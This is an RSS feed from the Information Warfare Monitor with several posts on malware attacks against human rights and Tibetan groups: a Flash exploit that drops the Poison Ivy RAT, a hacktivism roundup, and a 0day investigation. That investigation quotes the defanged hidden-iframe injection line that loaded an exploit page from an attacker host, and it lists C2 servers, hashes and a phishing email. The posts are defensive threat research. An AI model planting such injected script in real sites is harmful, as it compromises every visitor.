<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Information Warfare Monitor &#187; Civil Society and NGOs</title>
	<atom:link href="http://www.infowar-monitor.net/tag/civil-society/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.infowar-monitor.net</link>
	<description>Tracking Cyberpower</description>
	<lastBuildDate>Thu, 01 Dec 2011 16:11:49 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Flash Malware Leads to Poison Ivy RAT on Human Rights Site</title>
		<link>http://www.infowar-monitor.net/2011/07/flash-malware-leads-to-poison-ivy-rat-on-human-rights-site/</link>
		<comments>http://www.infowar-monitor.net/2011/07/flash-malware-leads-to-poison-ivy-rat-on-human-rights-site/#comments</comments>
		<pubDate>Wed, 13 Jul 2011 18:26:01 +0000</pubDate>
		<dc:creator>shardy</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Civil Society and NGOs]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[human rights]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://www.infowar-monitor.net/?p=7713</guid>
		<description><![CDATA[<blockquote>
In this post we document an instance of a human rights related website being compromised and used to disseminate malware. </blockquote>]]></description>
			<content:encoded><![CDATA[<div>
<p>Human rights and civil society organizations face a growing spectrum of online threats, including Internet filtering, website defacements, denial of service attacks, and targeted malware (malicious software) attacks. Such organizations can be particularly vulnerable to these threats due to limited resources and lack of computer network security support.</p>
<p>Malware attacks in particular are becoming an increasing problem for human rights and civil society groups. Past Information Warfare Monitor research has documented targeted email-based malware attacks on human rights groups  and the use of compromised organizational websites to deliver malware to site visitors (See <a href="http://www.infowar-monitor.net/2010/08/human-rights-and-malware-attacks/">Human Rights and Malware Attacks</a>, <a href="http://www.infowar-monitor.net/2009/09/targeted-malware-attack-on-foreign-correspondents-based-in-china/">Targeted Malware Attack on Foreign Correspondent’s based in China</a>, <a href="http://www.infowar-monitor.net/2010/11/nobel-peace-prize-amnesty-hk-and-malware/">Nobel Peace Prize, Amensty International HK and Malware</a>).  In this blog post we document another instance of a human rights related website being compromised and used to disseminate malware.</p>
<p>While conducting analysis of <a href="http://opennet.net/">OpenNet Initiative</a><sup>1</sup> Internet filtering test results, we found one site<sup>2</sup> covering Chinese human rights issues that triggered an anti-virus alert. The AV program identified a file from the website as Trojan.Swifi. Looking into this issue, we were able to determine that the site had been compromised and was being used to distribute malware to its visitors.</p>
<p>Tracing our browsing history, we first found that one of the site’s pages had an embedded IFrame that looks out of place:<br />
<img src="https://lh6.googleusercontent.com/UQBXjhwUCvB3ipBJSc7jIj1Jgb0XOoc6kRS2v2rDE642tITAqO2p676EqtxsJP4Tk_amRL6mF5WwDZz9_oDOCppeNm_56Jbswk_VH68f_2W_hVBNF1U" alt="" width="800px;" height="117px;" /></p>
<p>The frame points to a HTML file on another site, which loaded a Flash file (SWF):<br />
<img src="https://lh6.googleusercontent.com/xd8fgI-tFSZz1wbwA_u2n_HuY-F2oHIVUkRCkGsLiVVx8MSy2cpDqGKixXuS1lxXMS9faAs0oOkoFa-oTVEwJV3auT7AYwL5SWQ8EBMuJgimQ2QTRgs" alt="" width="581px;" height="455px;" /></p>
<p>The Flash file uses <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2110">CVE-2011-2110</a> (also described in <a href="http://www.adobe.com/support/security/bulletins/apsb11-18.html">APSB11-18</a>) to download and run another program hosted on the same website, without the knowledge or consent of the user. Trojan.Swifi is the name that Symantec gives to this threat. Shadowserver has a good <a href="http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20110617">writeup</a> on the first appearance of these Flash files being used in the wild, and gives some examples of sites they have found hosting this malware.</p>
<p>The URL of the file to download and run is encoded in the parameter passed to the SWF file in the link:<br />
<img src="https://lh6.googleusercontent.com/aj0l_T2woIeIOl6U4uc47xm7kGPzyy2AENTyGHaCXqGua3ewK5mCV97FIPr7l5k1t4aVMPn5z33q8COHp053DwZDkAoiKHt3igdZun-mFy_wUWUs3YA" alt="" width="800px;" height="49px;" /></p>
<p>The file itself is compressed using zlib and XOR encrypted with a one byte key. (The key is easy to determine: look for the zlib two byte header.)</p>
<p>The day after we discovered this issue, the link in the IFrame had been changed. The core of the attack, the Flash file, was still the same. However, the Flash file was hosted on a different server and loaded a slightly different executable program: same functionality, different filename and metadata. The first site was one of the examples listed in the Shadowserver report, which may be the reason why the frame was changed to point to a new location with a new payload.</p>
<p>In both cases, the downloaded program installs <a href="http://www.poisonivy-rat.com/">Poison Ivy</a>, a remote administration tool (RAT).</p>
<p>The Flash file is the same in both cases, as the two payloads have the same encryption and compression format. The URL of the payload is passed as a parameter outside of the Flash program. The MD5 hashes of the two programs and the Flash file are:</p>
<pre>b0b33a68bc9b410b8e58979b0409d466   Flash file</pre>
<pre>First sample:
 c9c58cab8441c07816727a7d9bb77cda  Encrypted + compressed payload
 8ea8b81afa8928da7a12610dfebc57b2  Payload</pre>
<pre>Second sample:
 c99129da6460dc27b0c92f84c8e0c3ed  Encrypted + compressed payload
 baff5ea74cb2b55ea124a20dc6037f19  Payload</pre>
<p>The two downloaded files are slightly different, and have different icons and program information.</p>
<p>Each program contacts a command and control (C2) server using a different dynamic DNS hostname provided by changeip.org (the first using epac.to, the second jetos.com). Both DNS names stopped working within a day, resolving to 0.0.0.0, while the server continues to operate on an ISP in Singapore. The way both were shut down so quickly suggests that this malware has been sent out by more sites than just the Chinese news site on which we discovered it.</p>
<p>Metadata in the first program identifies it as “s1.exe”, while the second is “s3.exe”. Both use “aaaa” as the company name, and “Chinese (PRC)” as the language. The first uses an information bubble as an icon, the second uses a printer icon. s3 also calls itself “flash2” internally, and uses that reference as the dynamic DNS hostname.</p>
<p>It is likely that this C2 server will continue to operate using different dynamic DNS hostnames until it is taken offline by the ISP (assuming the ISP is able and willing to shut it down. So far, the ISP has not responded to the IWM’s abuse reports beyond automated replies from their support ticketing system.) Searching records of previously reported malware activity does not show anything specific to the IP that these programs are connecting to, although it does show many connections to IPs in the same netblock. From our initial examination, the network that is hosting this C2 server seems to be ripe for abuse.</p>
<p>Despite being a legitimate news site, any user who had not made the recent Flash APSB11-18 update would be infected with the Poison Ivy remote administration tool, allowing an attacker full access to the victim’s computer. Due to the location of the hosting provider and dynamic DNS services, it is likely that the command and control server will remain active and this specific threat will persist. Only one line of the legitimate web page needed to be changed in order to compromise every single visitor to the site.</p>
<p>Just as former IWM researcher Nart Villeneuve <a href="http://www.infowar-monitor.net/2010/11/nobel-peace-prize-amnesty-hk-and-malware/">mentioned last November</a>, we can expect attacks to continue against the visitors of human rights websites via the legitimate but compromised websites themselves. In this case, the attack was patched very quickly and was not a 0day when discovered. However, the time it takes in general for vulnerabilities such as CVE-2011-2110 to be patched versus the rate of these exploits becoming weaponized and actively deployed is troublesome. This threat is especially a problem for smaller organizations that do not have dedicated IT staff with an extensive security budget.</p>
<p>&nbsp;</p>
</div>
<hr />
<div><sup>1</sup> The OpenNet Initiative (ONI) is a sister project to the Information Warfare Monitor. It is a collaborative partnership of three institutions: the Citizen Lab at the Munk School of Global Affairs, University of Toronto; the Berkman Center for Internet &amp; Society at Harvard University; and the SecDev Group (Ottawa). The objective of the ONI is  is to investigate, expose and analyze Internet filtering and surveillance practices in a credible and non-partisan fashion.</div>
<div><sup>2</sup> We are choosing not to identify the website, by request of the website owner, due to ongoing attacks.</div>
]]></content:encoded>
			<wfw:commentRss>http://www.infowar-monitor.net/2011/07/flash-malware-leads-to-poison-ivy-rat-on-human-rights-site/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Contestations in Cyberspace This Week</title>
		<link>http://www.infowar-monitor.net/2011/07/7686/</link>
		<comments>http://www.infowar-monitor.net/2011/07/7686/#comments</comments>
		<pubDate>Fri, 01 Jul 2011 19:21:41 +0000</pubDate>
		<dc:creator>Editor</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Anonymous]]></category>
		<category><![CDATA[Breachfest 2011]]></category>
		<category><![CDATA[Civil Society and NGOs]]></category>
		<category><![CDATA[Cyber Attacks]]></category>
		<category><![CDATA[e-G8]]></category>
		<category><![CDATA[lulzsec]]></category>
		<category><![CDATA[OECD]]></category>
		<category><![CDATA[Syrian Electronic Army]]></category>

		<guid isPermaLink="false">http://www.infowar-monitor.net/?p=7686</guid>
		<description><![CDATA[<blockquote>

<p>Contestation in and about cyberspace continued this week, with many instances of political events on the ground translating into anonymous actions in cyberspace, as well as an instance of multi-stakeholder disagreement regarding rules of the road for cyberspace. </p></blockquote>]]></description>
			<content:encoded><![CDATA[<p><strong>Contestations in Cyberspace this Week<br />
</strong></p>
<p>Contestation in and about cyberspace continued this week, with many instances of political events on the ground translating into anonymous actions in cyberspace, as well as an instance of multi-stakeholder disagreement regarding rules of the road for cyberspace. </p>
<p>On June 25, <a href="http://pastebin.com/1znEGmHa">LulzSec announced the end of its operations</a>. <a href="http://newyork.ibtimes.com/articles/171674/20110629/lulzsec-leader-sabu-identity-anonymous-antisec-disband-topiary-outed.htm">Some point out</a> that this announcement coincides with <a href="http://newyork.ibtimes.com/articles/171674/20110629/lulzsec-leader-sabu-identity-anonymous-antisec-disband-topiary-outed.htm">intensified backlash activity around the group</a>: increasing scrutiny from authorities and rival groups alike—such as the active seeking out of LulzSec members. On the same day as the announcement, a <a href="http://latimesblogs.latimes.com/technology/2011/06/hacker-group-claims-to-expose-identitites-of-lulzsec-members.html">Pastebin dump revealed</a> the names and personal information of alleged core LulzSec members. However, although LulzSec has disbanded operations, targeted and politically motived cyber attacks continued.</p>
<p>Breaches continued this week under the banner of AntiSec—the merged LulzSec and Anonymous operation. The group has continued their attack on Arizona’s Department of Public Safety and released personal information about police. Last week, the outfit breached the computers of the DPS and <a href="http://www.itproportal.com/2011/06/24/lulzsec-attacks-arizona-police-cites-immigration-policies-motivation/">released documents</a> in protest of Arizona’s immigration laws. At the same time, Anonymous released content from servers of other governments were also released—from Anguilla, Brazil and <a href="http://www.securitynewsdaily.com/anonymous-hackers-leak-zimbabwe-government-data-0917/">Zimbabwe</a> (in protest of President Mugabe). The group also leaked some US government documents, such as a counter cyber-terrorism training file. Yesterday, the group also attacked an <a href="http://orlandofloridaguide.com">Orlando, Florida tourism Web site</a>, as a part of an Orlando boycott campaign <a href="http://www.bbc.co.uk/news/world-us-canada-13952864">in protest of the city’s treatment of its local Food Not Bombs chapter</a>—a grassroots group which distributes food to the homeless.</p>
<p>Other groups have launched their own politically targeted attacks this week. It was <a href="http://www.pcmag.com/article2/0,2817,2387563,00.asp">reported</a> that a member of TeaMp0isoN has—in protest of the war in Iraq—leaked personal information about Tony Blair, along with the information of those members of government who supported the war in Iraq and the war on terror. Further, a lone hacker claimed responsibility the <a href="http://www.infosecurity-us.com/view/19028/new-group-of-hacktivists-claim-downing-of-mastercard-website/">DDoS attack against Mastercard</a>, which knocked the site offline in some areas on Tuesday. Gannett Government Media, the publisher of government news sites and print media as well as military-related publications, disclosed the information of an attack on its servers that occurred on June 7. <a href="http://militarytimes.com/news/2011/06/gannett-cyberattack-statement/">In its statement</a>, Gannett announced that attackers were able to gain unauthorized access to files containing information about some of its users. Web sites that were breached included those belonging to military related publications Defense News, the Armed Forces Journal, the Federal Times, Military Times Edge, Navy times, Air Force Times and the Marine Corps Times, amongst others. </p>
<p>Meanwhile, as new Information Warfare Monitor reports document <a href="http://www.infowar-monitor.net/2011/06/syrian-electronic-army-disruptive-attacks-and-hyped-targets/">here</a> and <a href="http://www.infowar-monitor.net/2011/06/syrian-electronic-army-defaces-41-web-sites-one-uk-government-web-site/">here</a>, the Syrian Electronic Army has intensified its defacements of Western and Israeli Web sites in protest of Western interference of Syria’s internal affairs, and Israel’s position on Syria and Palestine. At the same time, a Facebook group called the “Syrian Hackers School” has been recruiting members and promoting DoS tools and instructions on how to compromise Web site vulnerabilities.</p>
<p>The worries of an increasingly restricted Internet <a href="http://www.infowar-monitor.net/2011/05/7301/">as expressed by civil society groups in the lead up the recent eG8 summit</a> have now become a reality, crystallized in the final OECD <a href="http://www.oecd.org/dataoecd/40/21/48289796.pdf">communiqué</a> on Internet Policy-Making Principles—a document that evolved out of the OECD’s meeting on the Internet Economy this week in Paris in which governments, businesses, technical experts, and civil society participated. 80 civil society groups, under the <a href="http://csisac.org/">Civil Society Information Society Advisory Council</a> (CSISAC) coalition, refused endorsement of the communiqué. </p>
<p>In <a href="https://www.eff.org/files/filenode/international/CSISAC%20Statement%20on%20OECD%20Communique%2006282011%20FINAL%20COMMENTS%282%29.pdf">a statement released this week</a>, the CSISAC expressed its opposition to the document’s emphasis of intellectual property rights protection in guiding Internet policy. It expressed concern that the text may have the effect of elevating cyber security and intellectual property rights to the same level as international human rights (such as freedom of expression) to a point that the former would be disproportionately more protected at the expense of the latter. For instance,  CSISAC is concerned that the communique encourages <a href="http://arstechnica.com/tech-policy/news/2011/06/civilized-high-level-global-conference-wants-isps-to-play-copyright-cophigh-level-global-conference-wants-isps-to-play-copyright-cop.ars?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=rss">private intermediaries to make decisions regarding the “legality of content passing through their networks and platforms”</a>. CSISAC pointed out that:  </p>
<blockquote><p>This approach could create incentives for Internet intermediaries to delete or block contested content and lead to network filtering, which would harm online expression. In addition Internet intermediaries could voluntarily adopt a &#8220;graduated response&#8221; (the so-called three strikes rule) under which Internet users&#8217; access could be terminated based solely on repeated allegations of infringement. </p></blockquote>
<p>For a more detailed summary and analysis of the OECD meeting and civil society objections, see <a href="http://blog.internetgovernance.org/blog/_archives/2011/6/28/4847563.html">the Internet Governance Project’s latest blogpost</a>. For more on <a href="http://www.boingboing.net/2011/06/22/leaked-uk-copyright.html">increasing censorship in democracies</a>, <a href="http://www.washingtonpost.com/blogs/blogpost/post/web-censorship-moves-to-democracies-the-west/2011/06/27/AGPi4xnH_blog.html">see this Washington Post piece</a> which references <a href="http://www.google.com/transparencyreport/governmentrequests/removals/">Google’s recently updated Transparency Report</a>. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.infowar-monitor.net/2011/07/7686/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>China&#8217;s Human-Rights Hacking</title>
		<link>http://www.infowar-monitor.net/2010/02/chinas-human-rights-hacking/</link>
		<comments>http://www.infowar-monitor.net/2010/02/chinas-human-rights-hacking/#comments</comments>
		<pubDate>Wed, 03 Feb 2010 20:28:19 +0000</pubDate>
		<dc:creator>gwalton</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[China]]></category>
		<category><![CDATA[Civil Society and NGOs]]></category>
		<category><![CDATA[Espionage]]></category>
		<category><![CDATA[GhostNet]]></category>
		<category><![CDATA[human rights]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Tibet]]></category>
		<category><![CDATA[US]]></category>

		<guid isPermaLink="false">http://www.infowar-monitor.net/?p=5509</guid>
		<description><![CDATA[<a href="http://online.wsj.com/article/SB10001424052748704722304575038080333488998.html?mod=googlenews_wsj">WSJ Opinion Asia</a>: Attempts to silence critics extend beyond the mainland's borders.

<blockquote>Google's recent travails have drawn much-needed attention to the threat of Chinese cyber attacks on corporations. But there's another war being fought against a less publicized target: China's online human-rights activists.

Only two days after Hillary Clinton's January 21 speech supporting Internet freedom, five Chinese human-rights groups' Web sites, most of which have foreign-based servers, were paralyzed for up to 16 hours by denial-of-service attacks.

It's impossible to pinpoint exactly where the attacks on the weekend of January 23 to 24 originated, but the groups' sites have been attacked before, usually at sensitive times such as the 20-year anniversary of the Tiananmen Square massacre last June and China's 60th anniversary in October. For about the last three years, human-rights sites have not been able to operate from within China's censored borders.</blockquote>]]></description>
			<content:encoded><![CDATA[<p>Whether China&#8217;s &#8220;cyber militias&#8221; are merely teenage hackers or are state-supported is uncertain. What&#8217;s for sure is that these are not randomly targeted Web sites. They include the Independent Chinese PEN Center and China Human Rights Defenders, which have been calling publicly for the release of Liu Xiaobo, the ICPC&#8217;s former president and the co-author of the democratic manifesto called Charter &#8217;08. Similarly, the London-based International Tibet Support Network&#8217;s Web site has been down three times in the last two weeks.</p>
<p>China-based hackers have also targeted the State Department, the Naval War College, NASA and the World Bank in recent years. The so-called &#8220;Titan Rain&#8221; and &#8220;Ghostnet&#8221; cyber-espionage campaigns starting in 2003 involved hackers systematically infiltrating thousands of computer systems in hundreds of countries. While there&#8217;s no smoking gun, the Chinese military has heavily invested in equipping its cyber units, and there is a consensus in the U.S. defense community that the Chinese government at the very least tacitly supports thousands of hackers and cyberspace academics. Tibetan activist groups in particular have gotten used to cyber intrusions, which surged after unrest erupted in western China last March.</p>
<p>The hacking of the human-rights groups&#8217; sites may not seem as threatening as, say, an attack on critical infrastructure. But the intent is just as dangerous: to intimidate and silence those who try to speak up for the Chinese people. Even more reason for the U.S. and other free nations to bolster their defenses.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.infowar-monitor.net/2010/02/chinas-human-rights-hacking/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>&#8220;0day&#8221;: Civil Society and Cyber Security</title>
		<link>http://www.infowar-monitor.net/2009/10/0day-civil-society-and-cyber-security/</link>
		<comments>http://www.infowar-monitor.net/2009/10/0day-civil-society-and-cyber-security/#comments</comments>
		<pubDate>Wed, 28 Oct 2009 13:13:50 +0000</pubDate>
		<dc:creator>villeneuvewalton</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Civil Society and NGOs]]></category>
		<category><![CDATA[GhostNet]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Zero-day Attack]]></category>

		<guid isPermaLink="false">http://www.infowar-monitor.net/?p=5271</guid>
		<description><![CDATA[by Nart Villeneuve &#038; Greg Walton Civil society organizations face a wide range of online security threats that they are often ill equipped to defend. The lack of both resources and training leaves many organizations vulnerable to even basic Internet-based attacks. However, civil society organizations are being compromised by attackers using &#8220;0day&#8221; exploits – vulnerabilities [...]]]></description>
			<content:encoded><![CDATA[<p>by Nart Villeneuve &#038; Greg Walton</p>
<p>Civil society organizations face a wide range of online security threats that they are often ill equipped to defend. The lack of both resources and training leaves many organizations vulnerable to even basic Internet-based attacks. </p>
<p>However, civil society organizations are being compromised by attackers using &#8220;0day&#8221; exploits – vulnerabilities for which there is no patch of &#8220;fix&#8221; available from the software vendor.  Therefore, even if all the software a civil society organization is using is completely up-to-date it is still vulnerable. This results in a situation in which even organizations and individuals with reasonable levels of security are under threat.</p>
<p>It is difficult to determine who is behind the attacks and there may be no intent to target civil society specifically. Perhaps using a human rights themed email in a social engineering attack might just be a convenient way to get peoples&#8217; attention and compromise computer systems. Moreover, it remains unclear if the attackers were able to acquire 0day exploits before they became public, or if they simply quickly leveraged after they became publicly available and before there was a vendor supplied security patch. </p>
<p>Therefore, in this post we explore cases in which there is a some form of relationship between 0day exploits and their use against civil society organizations in an effort to understand the effect of these attacks given the difficult nature of attribution. </p>
<p>In this investigation we discovered that a well known site, 64tianwang.com, had been compromised and was propagating 0day exploits. Moreover, we found similar attacks specifically targeting the Tibetan community.<sup>1</sup> The second case used the high profile case of Tibetan filmmaker Dhondup Wangchen as bait. These attacks were so successful that Reporters Without Borders unknowingly propagated a link to a malicious website posing as a Facebook petition to release Dhondup Wangchen.</p>
<p><strong>Summary</strong></p>
<ul>
<li>Civil society organizations are compromised and used as vehicles to deliver 0day exploits</li>
<li>Attackers have access to multiple 0day exploits and switch their attacks to leverage newer exploits as they become available</li>
<li>Attackers leverage human rights issues as the context for malware distribution</li>
<li>The attacks are effective; civil society organizations continue to propagate malicious links within their communities without realizing it.</li>
</ul>
<p><strong>Background</strong></p>
<p>There is a wealth of information studying 0day malware attacks emanating from locations such as Russia and China. These reports document the ability of the attackers to leverage 0day exploits in their attacks:</p>
<blockquote><p>One of the most striking features of these attacks is how quickly they adapt new exploits to their<br />
infrastructure. Immediately after the release of a recent IE7 0day exploit, these attackers integrated the new technique into their framework.<sup>2</sup></p></blockquote>
<p>However, these reports do not focus on explicitly political attacks but integrate a variety of threats including fraud, acquiring gaming credentials and in general the theft of information. But the exploration of politically motivated malware attacks using 0day exploits is certainly nothing new. </p>
<p>Maarten Van Horenbeeck has been documenting targeted malware attacks leveled against a variety of targets including civil society organizations.<sup>3</sup> Van Horenbeeck documented the use of what he refers to as “custom vulnerability development” as well as known attacks.<sup>4</sup>  These attacks targeted NGO&#8217;s, the Tibetan community as well as the Falun Gong movement.  Van Horenbeeck&#8217;s research showed that some of the same control servers used in these types of attacks were also involved in attacks on a variety of other targets including the United States government, defense contractors and Japanese companies.<sup>5</sup></p>
<p>Our own previous investigations revealed connections between 0day malware and politically motivated attacks. During the &#8220;GhostNet&#8221; investigation we found that on September 11, 2008 the Tibetan Government-in-Exile in Dharamsala, India was infected with a malware that connected back to the domain control server on 221.10.254.248 using the host name 927.bigwww.com (221.10.254.248).<sup>6</sup> On December 10, 2008 this same domain name appeared on a list of domain names serving a 0day exploit for Internet Explorer 7 compiled by the Shadowserver Foundation.<sup>7</sup></p>
<p>In addition, computers located at the Office of His Holiness the Dalai Lama (OHHDL) as well as a Tibetan NGO called Drewla had bee compromised by a malware network which used www.lookbytheway.net and www.macfeeresponse.org as control servers. This malware network is well known and has been linked to a variety of attacks including the JBIG2 buffer overflow vulnerability.<sup>8</sup> At Drewla we also found a computer connection to a control server, dns3.westcowboy.com, that was documented by Maarten Van Horenbeeck<sup>9</sup> as well as connections to religion.xicp.net which was reportedly serving a 0day in February 2009.<sup>10</sup></p>
<p><strong>Investigation</strong></p>
<p>On 2009-07-06 ISC SANS posted a list of domain that were hosting 0day Internet Explorer exploits and 64tianwang.com was on the list.<sup>11</sup> 64tianwang.com is a well known organization set up in 1998 to help find missing persons in China, particularly victims of human trafficking. The organization expanded its mission to focus widely on human rights and had to move their website overseas after it was shut down by Chinese authorities.<sup>12</sup> The organization&#8217;s founder, Huang Qi, was arrested several times and was imprisoned from June 2000 to June 2005. He is currently in detention awaiting trial.<sup>13</sup><sup>14</sup> The  64tianwang.com has previously been a target for internet-based attacks.<sup>15</sup></p>
<p>An examination the source of http://www.64tianwang.com/index.htm revealed an iframe. The 64tianwang.com server was likely compromised and the malicious iframe was inserted into the legitimate content on the page. In fact, we have see “iframe attacks” affect a variety of organizations including the Foreign Correspondents’ Club of China (www.fccchina.org).<sup>16</sup>  Anyone visiting  64tianwang.com was loading a malicious page from rfsb.xicp.net:</p>
<blockquote><p>
document.write(&#8220;&lt;iFraMe width=&#8217;0&#8242; height=&#8217;0&#8242; src=&#8217;hxxp://rfsb.xicp.net/css/a.htm&#8217; frameborder=&#8217;0&#8242;></iFraMe>&#8220;);
</p></blockquote>
<p>The file, a.htm, contains malicious code that attempts to exploit Microsoft DirectShow.<sup>17</sup> Anyone visiting 64tianwang.com using Internet Explorer was likely compromised. </p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc1.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc1-300x124.png" alt="0day.doc1" title="0day.doc1" width="300" height="124" class="aligncenter size-medium wp-image-5276" /></a></p>
<p>Soon after the discovery of a new 0day exploit, this time in Microsoft Office, the attackers changed the directory used in the initial attack, &#8220;css&#8221;, to &#8220;cssbak&#8221; and began serving the  Microsoft Office Web Components 0day in the &#8220;css&#8221; directory instead.<sup>18</sup> Several versions of Microsoft Office were affected and anyone visiting this malicious page could be compromised even of their security updates were current.<sup>19</sup></p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc2.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc2-300x123.png" alt="0day.doc2" title="0day.doc2" width="300" height="123" class="aligncenter size-medium wp-image-5279" /></a></p>
<p>The details for the malicious website are:</p>
<blockquote><p>
Name: rfsb.xicp.net<br />
Address: 222.223.89.17<br />
netname: CHINANET-HE<br />
descr: CHINANET hebei province network<br />
descr: China Telecom<br />
country: CN
</p></blockquote>
<p>Our investigation discovered that rfsb.xicp.net (222.223.89.17) is also hosting some phishing pages posing at login screen for a variety of Chinese or Chinese language versions of email providers including: 126, 163, 21cn, Eyou, Hanmail, Hinet, Hotmail, QQ, Sina, Sohu, Tom, and Yahoo.</p>
<p> “Phishing” is a terms that refers to the fraudulent use of legitimate looking website to entice a using in revealing sensitive information such as user names and passwords.<sup>20</sup> In this case, the attacks appear to be particularly interested in compromising users on Chinese email providers.</p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc3.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc3-300x152.png" alt="0day.doc3" title="0day.doc3" width="300" height="152" class="aligncenter size-medium wp-image-5280" /></a></p>
<p>If users attempt to login to their email account, the credentials are forwarded to various servers under the attackers&#8217; control:</p>
<blockquote><p>
121.22.23.254<br />
netname: UNICOM-HE<br />
descr: China Unicom Hebei province network<br />
descr: China Unicom<br />
country: CN</p>
<p>124.237.109.234<br />
netname: CHINANET-HE<br />
descr: CHINANET hebei province network<br />
descr: China Telecom<br />
country: CN</p>
<p>121.22.28.29<br />
netname: QHD-YIWANGKEJI<br />
descr: CNC Group CHINA169 Hebei Province Network<br />
country: CN</p>
<p>222.223.89.17 (17.89.223.222.broad.qh.he.dynamic.163data.com.cn)<br />
netname: CHINANET-HE<br />
descr: CHINANET hebei province network<br />
descr: China Telecom<br />
country: CN</p>
<p>my218.3322.org (124.236.29.71, 71.29.236.124.broad.sj.he.dynamic.163data.com.cn)<br />
netname: CHINANET-HE<br />
descr: CHINANET hebei province network<br />
descr: China Telecom<br />
country: CN
</p></blockquote>
<p>The attackers use script that directs the users to a server under the control of the attacker and then redirects the user to the legitimate mail provider.</p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc4.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc4-300x33.png" alt="0day.doc4" title="0day.doc4" width="300" height="33" class="aligncenter size-medium wp-image-5282" /></a></p>
<p>In the case of QQ the attackers used malicious flash files that connect out to a server under the attackers control.<sup>21</sup></p>
<p>Interestingly, all the IP’s are in Hebei Province.</p>
<p>The sub-domain rfsb.xicp.net is on a free domain service *.xicp.net run by a Chinese registrar.<sup>22</sup> </p>
<p>Shortly thereafter, we were alerted to another malicious domain, dump.vicp.cc, which uses the same free domain service as rfsb.xicp.net. The malicious site, dump.vicp.cc, is also on the ISC SANS list of domains serving the Internet Explorer 0day exploit along with 64tianwang.com and rfsb.xicp.net.</p>
<p>This domain appeared in an email that was sent to the Tibetan community. The email comes from a GMail address with the name “Tseten Samdup.” Tseten Samdup is the name of the head of the Office of Tibet in Geneva, Switzerland.<sup>23</sup> </p>
<p>The email forwards an article from Reporters Without Borders (RSF) on the case of Tibetan documentary filmmaker Dhondup Wangchen. In addition to the RSF text, the email contains a link to a &#8220;Petition for the Release of Tibetan Filmmaker Dhondup Wangchen&#8221; hosted on Facebook which is sponsored by Students for a Free Tibet. However, the email also contains a link to  hxxp://dump.vicp.cc/groups/articles.asp?n=3 which loads the real petition along with a malicious frame.</p>
<blockquote><p>
    Subject: Re: Petition for Tibetan filmmaker&#8217;s<br />
    Date: Wed, 29 Jul 2009 22:52:26 +0800<br />
    From: Tseten Samdup<br />
    To: tsetenfreetibet@gmail.com</p>
<p>    Here is the the petition lauched by SFT.</p>
<p>http://apps.facebook.com/causes/petitions/26?m=bcb306a2&#038;recruiter_id=58958974&#038;_fb_noscript=1<hxxp://dump.vicp.cc/groups/articles.asp?n=3></p>
<p>    They have already collected 27,660 signatures.<br />
    Please sign your name if you have not.</p>
<p>    Tseden Samdup</p>
<p>    > ———- Forwarded message ———-<br />
    > From: RSF ASIA<br />
    > Date: Wed, Jul 29, 2009 at 8:05 AM<br />
    > Subject: Petition for Tibetan filmmakerâ€™s<br />
    > To: tsetenfreetibet@gmail.com<br />
    ><br />
    ><br />
    > Reporters Without Borders/Reporters sans frontiÃ¨res<br />
    ><br />
    > 29 July 2009<br />
    ><br />
    > CHINA – TIBET<br />
    > More than 13,000 signatures on petition for Tibetan filmmakerâ€™s release<br />
    > http://www.rsf.org/More-than-13-000-signatures-on.html<br />
    ><br />
    > Reporters Without Borders has given the Chinese authorities a petition<br />
    > calling for the release of Tibetan documentary filmmaker Dhondup Wangchen,<br />
    > who has been held since 23 March 2008 and is seriously ill with hepatitis B,<br />
    > which is not being properly treated. According to recent reports, he is now<br />
    > in a prison in Xining, the capital of Qinghai (a province adjoining Tibet).<br />
    ><br />
    > At the time of his arrest, Wangchen was completing a documentary about Tibet<br />
    > that was shown to foreign journalists in Beijing during the Olympic Games.<br />
    > He may be tried on charges of “separatism”.<br />
    ><br />
    > &#8220;There is an urgent need for the competent authorities to heed the appeal<br />
    > made by thousands of citizens around the world on behalf of a man whose only<br />
    > crime was to have filmed interviews,&#8221; Reporters Without Borders said. &#8220;The<br />
    > government should take account of Dhondup Wangchen&#8217;s state of health and<br />
    > free him on humanitarian grounds.&#8221;<br />
    ><br />
    > Reporters Without Borders handed in the petition today to the Chinese<br />
    > embassy in Paris. It was signed by 13,941 people, who included Tibetans,<br />
